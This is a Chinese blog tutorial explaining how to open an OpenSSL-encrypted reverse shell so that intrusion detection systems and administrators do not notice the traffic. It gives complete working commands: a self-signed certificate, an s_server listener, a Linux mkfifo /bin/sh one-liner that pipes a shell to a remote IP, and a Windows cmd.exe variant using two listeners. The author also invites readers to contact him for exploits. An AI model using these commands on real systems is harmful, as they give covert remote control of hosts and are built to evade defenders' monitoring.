使用OpenSsl加密反弹shell

  • A+
所属分类:安全文章

一、实际环境:

当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shell。


OpenSSL 简介:

在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份


二、实验过程:

1、首先生成自签名证书,输入的时候默认回车即可:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

使用OpenSsl加密反弹shell


2、服务端监听888端口:

openssl s_server -quiet -key key.pem -cert cert.pem -port 888

使用OpenSsl加密反弹shell


①Linux下使用mkfifo进行反弹shell:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.136.144:888 > /tmp/s; rm /tmp/s

使用OpenSsl加密反弹shell

成功反弹shell:

使用OpenSsl加密反弹shell



②Windows下反弹shell:

1、服务端要开启两个监听,因为以上命令会从 ip:port1 获取命令发送给 cmd.exe执行,然后把结果返回到 ip:port2,因此在本机需要启动两个 s_server

openssl s_server -quiet -key key.pem -cert cert.pem -port 888


openssl s_server -quiet -key key.pem -cert cert.pem -port 887

使用OpenSsl加密反弹shell


2、Windows下执行命令:

openssl s_client -quiet -connect 192.168.136.144:888 | cmd.exe | openssl s_client -quiet -connect 192.168.136.144:887

使用OpenSsl加密反弹shell


在服务端的888的窗口发送命令:

使用OpenSsl加密反弹shell


然后服务端887的窗口就能收到执行结果:

使用OpenSsl加密反弹shell


PS:经过测试,发送完命令后,等待好久都没结果回来,但是在windows上敲一下空格或者回车等操作,结果不一会就回来了

传输过程都是经过加密的,可以使用wireshark抓包分析一下



各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935

备注:公众号+师傅们的id吧

使用OpenSsl加密反弹shell


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: